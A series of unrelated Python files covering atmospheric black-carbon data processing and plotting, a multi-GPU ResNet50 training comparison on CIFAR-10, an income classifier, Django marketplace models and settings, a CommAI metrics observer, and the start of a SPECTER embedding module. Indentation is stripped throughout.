temp = []
for line in WHI_pressures:
date = line[0]
pressure = line[1]
if date.year == 2012:
temp.append(pressure)
WHI_room_temps = []
with open('C:/Users/<NAME>/Documents/Data/WHI long term record/WHI station met and other data/whi__rt_stackflow_summer_2009-2012.txt', 'r') as f:
f.readline()
for line in f:
newline = line.split('\t')
date_PST = datetime.strptime(newline[0], '%d/%m/%Y %H:%M')
try:
temp_degC = float(newline[1])
temp_K = temp_degC + 273.15
if date_PST.year == 2012:
WHI_room_temps.append([date_PST,temp_K])
except:
continue
#set up arrays
full_record = []
record_list = []
record_list_uncorrSTP = []
record_dict = {}
record_dict_uncorrSTP = {}
spike_times = []
#get BC data and remove spikes
prev_ts = datetime.strptime('2000/01/01', '%Y/%m/%d')
prev_bc_mass_conc = 1000
time_jump = timedelta(hours=1)
os.chdir('D:/2012/WHI_UBCSP2/Binary/10 min bins - 2012 calib - AD corrected/',)
for file in os.listdir('.'):
if file.endswith('.binpckl'):
print file
f = open(file, 'r')
single_bc_record = pickle.load(f)
f.close()
i=0
for row in single_bc_record:
#row info: interval_mid_time, incand_number_conc, BC_mass_conc, interval_sampling_duration, interval_incand_count
#set units
record_date = datetime.utcfromtimestamp(float(row[0]))
record_hour = datetime(record_date.year,record_date.month,record_date.day,record_date.hour)
number_conc = row[1]*1e6 #converts incand #/cm3 to #/m3
#for BC mass the conversion from /cm3 to /m3 and from fg to ng cancel each other out, so no manipulation is necessary
#get STP correction factor - pressure term
number_pressures = len(WHI_pressures)
if number_pressures:
WHI_pressure_time = WHI_pressures[0][0]
while record_date > WHI_pressure_time + timedelta(hours=1):
WHI_pressures.pop(0)
if len(WHI_pressures):
WHI_pressure_time = WHI_pressures[0][0]
WHI_pressure = WHI_pressures[0][1]
continue
else:
break
number_pressures = len(WHI_pressures)
#get STP correction factor - temp term
number_temps = len(WHI_room_temps)
if number_temps:
WHI_temp_time = WHI_room_temps[0][0]
while record_date > WHI_temp_time + timedelta(hours=1):
WHI_room_temps.pop(0)
if len(WHI_room_temps):
WHI_temp_time = WHI_room_temps[0][0]
WHI_temp = WHI_room_temps[0][1]
continue
else:
break
number_temps = len(WHI_room_temps)
#calc correction factor
volume_ambient = (R*WHI_temp)/(WHI_pressure)
volume_STP = volume_ambient*(WHI_pressure/101325)*(273/WHI_temp)
correction_factor_for_STP = volume_ambient/volume_STP
#determine if bc mass conc is a spike from snow machines etc
BC_mass_conc = row[2]
#if record_date.year == 2012 and BC_mass_conc > 200.:
# continue
if (BC_mass_conc < 6*prev_bc_mass_conc) or (BC_mass_conc < 10.0) or (record_date > prev_ts +time_jump): #check for spikes
if BC_mass_conc < 2000: #set abs max
#correcting the rows that are not spikes for the portion of the mass distr that we're not sampling
#we have to check the LL and UL though, becuase some very few are nans (from binning code) and these mess up all subsequent calcs
#row[2] = mass conc, row[3] = LL, row[4] = UL
median = row[2]
BC_mass_corr = row[2]*correction_factor_for_massdistr*correction_factor_for_STP
BC_mass_uncorr = row[2]*correction_factor_for_massdistr
new_row = [number_conc,BC_mass_corr]
new_row_uncorr = [number_conc,BC_mass_uncorr]
if record_hour not in record_dict:
record_dict[record_hour] = []
record_dict[record_hour].append(new_row)
if record_hour not in record_dict_uncorrSTP:
record_dict_uncorrSTP[record_hour] = []
record_dict_uncorrSTP[record_hour].append(new_row_uncorr)
prev_bc_mass_conc = BC_mass_conc
i=0
else:
spike_times.append(record_date)
prev_ts = record_date
i+=1
temp = []
for hour in record_dict:
mean_number = np.mean([row[0] for row in record_dict[hour]])
mean_mass = np.mean([row[1] for row in record_dict[hour]])
record_list.append([hour,mean_number,mean_mass])
if hour.month == 7 and hour.day in [3,4,5,6,7,8,9,10,11]:
temp.append(mean_mass)
print 'mean 3-11', np.mean(temp)
record_list.sort()
for hour in record_dict_uncorrSTP:
mean_number = np.mean([row[0] for row in record_dict_uncorrSTP[hour]])
mean_mass = np.mean([row[1] for row in record_dict_uncorrSTP[hour]])
record_list_uncorrSTP.append([hour,mean_number,mean_mass])
record_list_uncorrSTP.sort()
BC_dates_2012 = [dates.date2num(row[0]) for row in record_list]
BC_number_conc_2012 = [row[1] for row in record_list]
BC_mass_conc_2012 = [row[2] for row in record_list]
BC_dates_2012_uncorr = [dates.date2num(row[0]) for row in record_list_uncorrSTP]
BC_number_conc_2012_uncorr = [row[1] for row in record_list_uncorrSTP]
BC_mass_conc_2012_uncorr = [row[2] for row in record_list_uncorrSTP]
#########EC filter data#######
file = 'C:/Users/<NAME>/Documents/Data/WHI long term record/filter EC/WSL_OCEC_Database_(Aug.2008-May.2012)_QAQC_PI_(to RL).txt'
EC_filter_data = []
with open(file, 'r') as f:
for i in range(0,19):
f.readline()
for line in f:
newline = line.split('\t')
start_date = datetime.strptime(newline[1], '%d/%m/%Y %H:%M') #PST PDT???
stop_date = datetime.strptime(newline[2], '%d/%m/%Y %H:%M')
try:
EC_conc = float(newline[9])*1000 # orig is in ugC/m3 so *1000 to get ng/m3
except:
print 'no value'
continue
date = (stop_date-start_date)/2 + start_date
EC_filter_data.append([date,EC_conc])
EC_dates = [dates.date2num(row[0]) for row in EC_filter_data]
EC_mass_concs = [row[1] for row in EC_filter_data]
######GC 1 h values
#
##database connection
#cnx = mysql.connector.connect(user='root', password='<PASSWORD>', host='localhost', database='black_carbon')
#cursor = cnx.cursor()
#
#cursor.execute(('''SELECT *
# FROM whi_gc_and_sp2_1h_mass_concs
# ''')
# )
#data_1h = cursor.fetchall()
#
#times_PST = []
#meas = []
#GC = []
#for row in data_1h:
# ts = row[1]
# gc = row[3]
#
# ts_datetime = datetime.utcfromtimestamp(ts)
# times_PST.append(dates.date2num(ts_datetime+timedelta(hours=-8)))
# GC.append(gc)
#
#cnx.close()
####plotting
#os.chdir('C:/Users/<NAME>/Documents/Data/EC Siberian Fire paper/')
#file = open('WHI_rBC_record_July2012.txt', 'w')
#file.write('interval_mid_time_(PST)'+ '\t' +'incand_number_conc(#/m3)'+ '\t' +' BC_mass_conc(ng/m3)'+ '\n')
#
#for row in record_list:
# line = '\t'.join(str(x) for x in row)
# file.write(line + '\n')
#
#file.close()
fig = plt.figure(figsize=(12,6))
hfmt = dates.DateFormatter('%b')
hfmt = dates.DateFormatter('%m-%d')
display_month_interval = 1
ax1 = plt.subplot2grid((1,1), (0,0))
ax1.plot(BC_dates_2012,BC_mass_conc_2012, color='g', marker = '.',label='SP2 corrected to STP')
#ax1.plot(BC_dates_2012_uncorr,BC_mass_conc_2012_uncorr, color='grey', marker = '.',label='SP2 uncorrected')
ax1.scatter(EC_dates,EC_mass_concs, color='r', marker = 'o',s=26,label='EC Filters')
#ax1.scatter(times_PST,GC, color='g', marker = '.',label='GEOS-Chem')
ax1.xaxis.set_major_formatter(hfmt)
ax1.xaxis.set_major_locator(dates.DayLocator(interval = display_month_interval))
ax1.xaxis.set_visible(True)
ax1.set_ylabel('rBC mass concentration (ng/m3 - STP)')
plt.text(0.05, 0.9,'2012', transform=ax1.transAxes,fontsize=18)
#ax1.set_ylim(0, 250)
#ax1.set_xlim(dates.date2num(datetime.strptime('2012/07/20 12:00', '%Y/%m/%d %H:%M')), dates.date2num(datetime.strptime('2012/07/30', '%Y/%m/%d')))
ax1.set_ylim(0, 320)
ax1.set_xlim(dates.date2num(datetime.strptime('2012/04/01 12:00', '%Y/%m/%d %H:%M')), dates.date2num(datetime.strptime('2012/05/31', '%Y/%m/%d')))
plt.legend()
plt.show()
|
<filename>main.py
import time
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from resnet import ResNet50Base, ResNet50OneGPU, ResNet50TwoGPUs, ResNet50SixGPUs
# from utils import progress_bar
import copy
if __name__=="__main__":
transform_train = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(
root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(
trainset, batch_size=100, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(
root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(
testset, batch_size=100, shuffle=False, num_workers=2)
loss_fn = nn.CrossEntropyLoss()
model = ResNet50Base()
parts = [
model._part1(),
model._part2(),
model._part3(),
model._part4(),
model._part5(),
model._part6(),
]
local1_devices = ["cuda:0"]
local1_model = ResNet50OneGPU(copy.deepcopy(parts), local1_devices)
local1_opt = optim.SGD(local1_model.parameters(), lr=0.05)
local2_devices = ["cuda:1", "cuda:2"]
local2_model = ResNet50TwoGPUs(copy.deepcopy(parts), local2_devices)
local2_opt = optim.SGD(local2_model.parameters(), lr=0.05)
local3_devices = ["cuda:0", "cuda:1", "cuda:2", "cuda:3", "cuda:4", "cuda:5"]
local3_model = ResNet50SixGPUs(copy.deepcopy(parts), local3_devices)
local3_opt = optim.SGD(local3_model.parameters(), lr=0.05)
def train(epoch):
total = 0
local1_model.train()
local1_train_loss = 0
local1_correct = 0
local1_start = 0
local1_finish = 0
local2_model.train()
local2_train_loss = 0
local2_correct = 0
local2_start = 0
local2_finish = 0
local3_model.train()
local3_train_loss = 0
local3_correct = 0
local3_start = 0
local3_finish = 0
pbar = tqdm(trainloader)
for batch_idx, (inputs, labels) in enumerate(pbar):
total += labels.size(0)
local1_start = time.time()
local1_labels = labels.to(local1_devices[-1])
local1_opt.zero_grad()
local1_outputs = local1_model(inputs.to(local1_devices[0]))
local1_loss = loss_fn(local1_outputs, local1_labels)
local1_loss.backward()
local1_opt.step()
local1_train_loss += local1_loss.item()
_, local1_predicted = local1_outputs.max(1)
local1_correct += local1_predicted.eq(local1_labels).sum().item()
local1_finish = time.time()
local2_start = time.time()
local2_labels = labels.to(local2_devices[-1])
local2_opt.zero_grad()
local2_outputs = local2_model(inputs.to(local2_devices[0]))
local2_loss = loss_fn(local2_outputs, local2_labels)
local2_loss.backward()
local2_opt.step()
local2_train_loss += local2_loss.item()
_, local2_predicted = local2_outputs.max(1)
local2_correct += local2_predicted.eq(local2_labels).sum().item()
local2_finish = time.time()
local3_start = time.time()
local3_labels = labels.to(local3_devices[-1])
local3_opt.zero_grad()
local3_outputs = local3_model(inputs.to(local3_devices[0]))
local3_loss = loss_fn(local3_outputs, local3_labels)
local3_loss.backward()
local3_opt.step()
local3_train_loss += local3_loss.item()
_, local3_predicted = local3_outputs.max(1)
local3_correct += local3_predicted.eq(local3_labels).sum().item()
local3_finish = time.time()
pbar.set_postfix({'l1': (local1_finish - local1_start), 'l2': (local2_finish - local2_start), 'l3': (local3_finish - local3_start)})
# progress_bar(batch_idx, len(trainloader), '| %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d)'
# % (local1_train_loss/(batch_idx+1), 100.*local1_correct/total, local1_correct, total,
# local2_train_loss/(batch_idx+1), 100.*local2_correct/total, local2_correct, total,
# local3_train_loss/(batch_idx+1), 100.*local3_correct/total, local3_correct, total))
assert local1_train_loss == local2_train_loss == local3_train_loss
assert local1_correct == local2_correct == local3_correct
def test(epoch):
total = 0
local1_model.eval()
local1_test_loss = 0
local1_correct = 0
local1_start = 0
local1_finish = 0
local2_model.eval()
local2_test_loss = 0
local2_correct = 0
local2_start = 0
local2_finish = 0
local3_model.eval()
local3_test_loss = 0
local3_correct = 0
local3_start = 0
local3_finish = 0
pbar = tqdm(testloader)
with torch.no_grad():
for batch_idx, (inputs, labels) in enumerate(pbar):
total += labels.size(0)
local1_start = time.time()
local1_labels = labels.to(local1_devices[-1])
local1_outputs = local1_model(inputs.to(local1_devices[0]))
local1_loss = loss_fn(local1_outputs, local1_labels)
local1_test_loss += local1_loss.item()
_, local1_predicted = local1_outputs.max(1)
local1_correct += local1_predicted.eq(local1_labels).sum().item()
local1_finish = time.time()
local2_start = time.time()
local2_labels = labels.to(local2_devices[-1])
local2_outputs = local2_model(inputs.to(local2_devices[0]))
local2_loss = loss_fn(local2_outputs, local2_labels)
local2_test_loss += local2_loss.item()
_, local2_predicted = local2_outputs.max(1)
local2_correct += local2_predicted.eq(local2_labels).sum().item()
local2_finish = time.time()
local3_start = time.time()
local3_labels = labels.to(local3_devices[-1])
local3_outputs = local3_model(inputs.to(local3_devices[0]))
local3_loss = loss_fn(local3_outputs, local3_labels)
local3_test_loss += local3_loss.item()
_, local3_predicted = local3_outputs.max(1)
local3_correct += local3_predicted.eq(local3_labels).sum().item()
local3_finish = time.time()
pbar.set_postfix({'l1': (local1_finish - local1_start), 'l2': (local2_finish - local2_start), 'l3': (local3_finish - local3_start)})
# progress_bar(batch_idx, len(testloader), '| %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d) | %.3f | %.3f%% (%d/%d)'
# % (local1_test_loss/(batch_idx+1), 100.*local1_correct/total, local1_correct, total,
# local2_test_loss/(batch_idx+1), 100.*local2_correct/total, local2_correct, total,
# local3_test_loss/(batch_idx+1), 100.*local3_correct/total, local3_correct, total))
assert local1_test_loss == local2_test_loss == local3_test_loss
assert local1_correct == local2_correct == local3_correct
for epoch in range(10):
print('\nEpoch: %d' % epoch)
train(epoch)
test(epoch)
|
import pandas
import numpy
import pickle
import sklearn
from sklearn import tree
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from yellowbrick.classifier import classificationReport
# Get the dataset and read the dataset
get_dataset = "static/assets/dataset/adult.csv"
read_dataset = pandas.read_csv(get_dataset)
# filter the data and check for empty values
# Replace the empty values with the modal value
# of each column
for col in read_dataset:
read_dataset[col] = read_dataset[col].replace("?",numpy.NaN)
read_dataset = read_dataset.apply(lambda x:x.fillna(x.value_counts().index[0]))
# Perform Data discretization and make data easy
# to read and Understand more clearly
read_dataset.replace(['Divorced','Married-AF-spouse','Married-civ-spouse','Married-spouse-absent','Never-married','Separated','Widowed'],['divorced','married','married','married','not married','not married','not married'], inplace=True)
# Try to Label Encode the data
category_columns= ['workclass', 'race', 'education','marital-status', 'occupation', 'relationship', 'gender', 'native-country', 'income']
labelEncoder = preprocessing.LabelEncoder()
# Mapping the dictionary of values
mapping_dict = {}
for col in category_columns:
read_dataset[col] = labelEncoder.fit_transform(read_dataset[col])
le_name_mapping = dict(zip(labelEncoder.classes_, labelEncoder.transform(labelEncoder.classes_)))
mapping_dict = le_name_mapping
# Drop the columns which are not useful in the dataset
read_dataset=read_dataset.drop(['fnlwgt','educational-num'], axis=1)
read_dataset.head()
# Fitting the data to be trained
X = read_dataset.values[:,:12]
y = read_dataset.values[:, 12]
# Train the data using DecisionTreeAlgorithm
# Using the gini index and entropy functions
# Testdata should be 0.3 -- TrainingData should be 0.7
X_train,X_test,y_train,y_test = train_test_split(X,y, test_size = 0.3, random_state=100)
# Train the data using LinearRegression
# Testdata should be 0.3 -- TrainingData should be 0.7
linear_reg = LinearRegression()
linear_reg.fit(X_train,y_train)
prediction_Lreg = linear_reg.predict(X_test)
# Calculate the Accuracy score of our LinearRegression classifier
print("Accuracy Score using LinearRegression is:", accuracy_score(y_test, prediction_Lreg))
# Train the data using LogisticRegression
# Testdata should be 0.3 -- TrainingData should be 0.7
logistic_reg = LogisticRegression()
logistic_reg.fit(X_train,y_train)
prediction_Loreg = logistic_reg.predict(X_test)
# Calculate the Accuracy score of our LinearRegression classifier
print("Accuracy Score using LogisticRegression is:", accuracy_score(y_test, prediction_Loreg))
# Classification report for linearRegression
visualiser = classificationReport(linear_reg,classes = ['won','loss'])
visualiser.fit(X_train,y_train)
visualiser.score(y_test,prediction_Lreg)
result = visualiser.poof()
# Classification report for LogisticRegression
visualiser = classificationReport(logistic_reg,classes = ['won','loss'])
visualiser.fit(X_train,y_train)
visualiser.score(y_test,prediction_Loreg)
result = visualiser.poof()
# Now lets say that after all our analysis we choose
# Logistic regression as our algorithm to work with
# We'll write the model to a pkl file
pickle.dump(logistic_reg,open('model.pkl','wb')) |
<reponame>gurnitha/2022-django4-marketplace-jfu<filename>app/marketplace/models.py
# app/marketplace/models.py
# Django modules
from django.db import models
# Locals
from app.accounts.models import Users
# Create your models here.
# NAMA MODEL/TABEL: Categories
class Categories(models.Model):
name_category = models.CharField(max_length=100)
titile_list_category = models.CharField(max_length=100)
slug = models.SlugField(max_length=225, unique=True)
image_category = models.ImageField(upload_to='products/categories/%Y/%m/%d', blank=True)
icon_category = models.ImageField(upload_to='products/categories/icons/%Y/%m/%d', blank=True)
view_category = models.IntegerField(default='0')
date_created_category = models.DateTimeField(auto_now_add=True)
date_updated_category = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('name_category',)
verbose_name_plural = "Categories"
def __str__(self):
return self.name_category
# NAMA MODEL/TABEL: Subcategories
class Subcategories(models.Model):
id_category_subcategory = models.ForeignKey(Categories, on_delete=models.CASCADE)
titile_list_category = models.CharField(max_length=100)
name_subcategory = models.CharField(max_length=100)
slug = models.SlugField(max_length=225, unique=True)
image_subcategory = models.ImageField(upload_to='products/subcategories/%Y/%m/%d', blank=True, null=True)
view_subcategory = models.IntegerField(default='0')
date_created_subcategory = models.DateTimeField(auto_now_add=True)
date_updated_subcategory = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('name_subcategory',)
verbose_name_plural = "Subcategories"
def __str__(self):
return self.name_subcategory
# NAMA MODEL/TABEL: Stores
class Stores(models.Model):
id_user_store = models.ForeignKey(Users, on_delete=models.CASCADE)
name_store = models.CharField(max_length=100)
slug = models.SlugField(max_length=225, unique=True)
logo_store = models.ImageField(upload_to='products/stores/%Y/%m/%d', blank=True, null=True)
cover_store = models.ImageField(upload_to='products/stores/%Y/%m/%d', blank=True, null=True)
about_store = models.TextField()
abstract_store = models.TextField()
email_store = models.CharField(max_length=100)
country_store = models.CharField(max_length=50)
city_store = models.CharField(max_length=50)
address_store = models.TextField()
phone_store = models.CharField(max_length=50)
socialnetwork_store = models.TextField()
products_store = models.TextField()
date_created_store = models.DateTimeField(auto_now_add=True)
date_updated_store = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('name_store',)
verbose_name_plural = "Stores"
def __str__(self):
return self.name_store
# NAMA MODEL/TABEL: Products
class Products(models.Model):
feedback_product = models.TextField()
state_product = models.CharField(max_length=50)
id_store_product = models.ForeignKey(Stores, on_delete=models.CASCADE)
id_category_product = models.ForeignKey(Categories, on_delete=models.CASCADE)
id_subcategory_product = models.ForeignKey(Subcategories, on_delete=models.CASCADE)
title_list_product = models.CharField(max_length=50)
name_product = models.CharField(max_length=50)
slug = models.SlugField(max_length=225, unique=True)
image_product = models.ImageField(upload_to='products/products/%Y/%m/%d, blank=True', null=True)
price_product = models.DecimalField(max_digits=10, decimal_places=2)
shipping_product = models.CharField(max_length=50)
stock_product = models.IntegerField(default='0')
delivery_time_product = models.IntegerField(default='0')
offer_product = models.CharField(max_length=100)
description_product = models.TextField()
summary_product = models.TextField()
details_product = models.TextField()
specifications_product = models.CharField(max_length=50)
gallery_product = models.CharField(max_length=50)
video_product = models.TextField()
top_banner_product = models.CharField(max_length=255)
default_banner_product = models.CharField(max_length=255)
horizontal_slider_product= models.TextField()
vertical_slider_product = models.TextField()
reviews_product = models.TextField()
tags_product = models.CharField(max_length=50)
sales_product = models.IntegerField(default='0')
views_product = models.IntegerField(default='0')
date_created_product = models.DateTimeField(auto_now_add=True)
date_updated_product = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('name_product',)
verbose_name_plural = "Products"
def __str__(self):
return self.name_product
|
<reponame>germank/CommAI-env<gh_stars>0
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from pool_metrics import PoolMetrics
from json_reporter import JSONReporter
from console_reporter import ConsoleReporter
class PoolObserver(object):
def __init__(self, period, log_filename, food_size, history_size):
self.pool_metrics = PoolMetrics(food_size, history_size)
self.period = period
self.json_reporter = JSONReporter(self.pool_metrics, log_filename)\
if log_filename else None
self.console_reporter = ConsoleReporter(self.pool_metrics, period)
self.track_metric('current_expressions_count', 'count')
self.track_metric('current_expressions_distinct_count', 'dcount')
self.track_metric('current_expressions_reducible_count', 'red.count')
self.track_metric('current_expressions_top10_length')
self.track_metric('current_expressions_max_length', 'maxlen')
self.track_metric('current_expressions_mean_length')
# debug
self.track_metric('current_expressions_max_depth', 'maxdepth')
#self.track_metric('current_expressions_reduction_count', 'reductions', '{:.1f}')
# end debug
self.track_metric('current_expressions_mean_length', 'meanlen', '{:.2f}')
self.track_metric('recent_expressions_recurrence_count')
self.track_metric('recent_largest_scc_size', 'sccLen')
self.track_metric('recent_scc_count', '#scc')
self.track_metric('recent_raf_scc_count')
self.track_metric('recent_raf_length', 'raf')
self.track_metric('recent_raf_product_max_length')
self.track_metric('recent_raf_products_count')
self.track_metric('recent_reactions_count')
self.track_metric('current_expressions_max_multiplicity')
self.track_metric('current_expressions_mean_multiplicity')
self.track_metric('current_expressions_percent_at_1', '@1', '{:.0f}')
self.track_metric('current_expressions_percent_at_2', '@2', '{:.0f}')
self.track_metric('recent_raf_products_max_multiplicity', 'raf_mult')
self.track_metric('recent_raf_complement_products_max_multiplicity')
self.track_metric('recent_raf_cycle_length', 'raf_lvl')
self.track_metric('recent_raf_substrate_count', 'sbst')
self.track_metric('current_expressions_max_multiplicity_length')
self.track_metric('current_p_reduce', 'Pr', '{:.2f}')
self.track_metric('current_p_break')
self.track_metric('current_p_combine')
self.track_metric('current_n_reduce')
self.track_metric('current_n_break')
self.track_metric('current_n_combine')
self.track_metric('current_total_size', 'T')
#self.track_metric('recent_recurrent_expression_length', 'rec_expr_len')
#self.track_metric('recent_raf_scc_expressions_multiplicity', 'scc_mult')
def track_metric(self, metric, console_abbr=None, console_fmt='{}'):
if self.json_reporter:
self.json_reporter.track_metric(metric)
if console_abbr:
self.console_reporter.track_metric(metric, console_abbr, console_fmt)
def on_step_computed(self, pool, ticks):
if ticks > 0 and ticks % self.period == 0:
self.report(ticks)
def on_reaction_computed(self, pool, reaction):
self.pool_metrics.on_reaction_computed(pool, reaction)
def report(self, generation):
if self.json_reporter:
self.json_reporter.report(generation)
self.console_reporter.report(generation)
self.pool_metrics.reset_perishable_history()
def print_preceding_graph(self, graph, m, depth=1):
if depth > 0:
for reaction in graph.predecessors(m):
reactives = list(map(str, reaction.reactives))
reaction_type = graph.node[reaction]['reaction_type']
if reaction_type != 'reduce':
continue
print(reaction_type, " + ".join(reactives), '->', m)
for r in reaction:
if r.size() >4:
#if term.is_reducible(r, None):
# print(" / ".join(map(term.to_str, map(operator.itemgetter(0), term.all_reductions(r)))))
self.print_preceding_graph(graph, r, depth-1)
|
<gh_stars>0
"""
Django settings for api project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
from datetime import timedelta
from api import config
import os
import secrets
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#Cybercom config settings
APPLICATION_TITLE = config.APPLICATION_TITLE
API_VERSION='2.0'
# Set default model primary key field type
DEFAULT_AUTO_FIELD = 'django.db.models.AutoField'
# Session cookies
# https://docs.djangoproject.com/en/2.2/ref/settings/#session-cookie-domain
# wild card '*.example.edu'
SESSION_COOKIE_DOMAIN = None
CSRF_COOKIE_DOMAIN = None
# If you want to mount API with nginx with location other than /
# Change to desired url - '/api/'
FORCE_SCRIPT_NAME = '/api/'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv('DJANGO_SECRET_KEY', secrets.token_urlsafe(64))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = bool(os.getenv('DEBUG') in ('True', 'true'))
ALLOWED_HOSTS = [host.strip() for host in os.getenv('ALLOWED_HOSTS', '').split(',') if host.strip()]
#Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '[{asctime}] [{module}] [{levelname}] - {message}',
'datefmt': '%Y-%m-%d %H:%M:%S',
'style': '{',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'standard',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
},
},
}
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'rest_framework_simplejwt.token_blacklist',
'data_store',
'catalog',
'cybercom_queue',
]
MIDDLEWARE = [
'django.middleware.gzip.GZipMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django_settings_export.settings_export',
],
},
},
]
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': f'{config.MEMCACHE_HOST}:{config.MEMCACHE_PORT}',
}
}
SETTINGS_EXPORT_VARIABLE_NAME = 'my_settings'
SETTINGS_EXPORT = [
'APPLICATION_TITLE',
'API_VERSION',
]
WSGI_APPLICATION = 'api.wsgi.application'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
#'rest_framework.authentication.BasicAuthentication',
'rest_framework_simplejwt.authentication.JWTAuthentication',
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGINATE_BY': 10,
'PAGINATE_BY_PARAM': 'page_size',
'MAX_PAGINATE_BY': 1000000
}
#Customize JWT
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'ROTATE_REFRESH_TOKENS': False,
'BLACKLIST_AFTER_ROTATION': True,
'ALGORITHM': 'HS256',
'SIGNING_KEY': SECRET_KEY,
'VERIFYING_KEY': None,
'AUTH_HEADER_TYPES': ('Bearer',),
'USER_ID_FIELD': 'username',
'USER_ID_CLAIM': 'username',
'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
}
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
DATABASE_ROUTERS = []
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static")
#STATICFILES_DIRS = [
# os.path.join(BASE_DIR, "static"),
#]
|
<filename>expertise/models/multifacet_recommender/specter.py
from allennlp.commands.predict import _PredictManager
from allennlp.common import Params
from allennlp.common.checks import ConfigurationError
from allennlp.common.util import lazy_groups_of, import_submodules
from allennlp.data import DatasetReader
from allennlp.models import Archive
from allennlp.models.archival import load_archive
from allennlp.predictors.predictor import Predictor, DEFAULT_PREDICTORS
from collections import defaultdict
import json
import os
import torch
from tqdm import tqdm
from typing import Optional
import redisai
import numpy as np
from expertise.service.server import redis_embeddings_pool
import logging
logging.getLogger('allennlp.common.params').disabled = True
logging.getLogger('allennlp.common.from_params').disabled = True
logging.getLogger('allennlp.common.registrable').setLevel(logging.WARNING)
logging.getLogger('allennlp.nn.initializers').disabled = True
import_submodules('specter')
"""
archive_file: $SPECTER_FOLDER/model.tar.gz
input_file: $SAMPLE_ID_TRAIN
include-package: specter
predictor: specter_predictor
overrides:
model:
predict_mode: 'true'
include_venue: 'false'
dataset_reader:
type: 'specter_data_reader'
predict_mode: 'true'
paper_features_path: $SPECTER_TRAIN_FILE
included_text_fields: 'abstract title'
vocabulary:
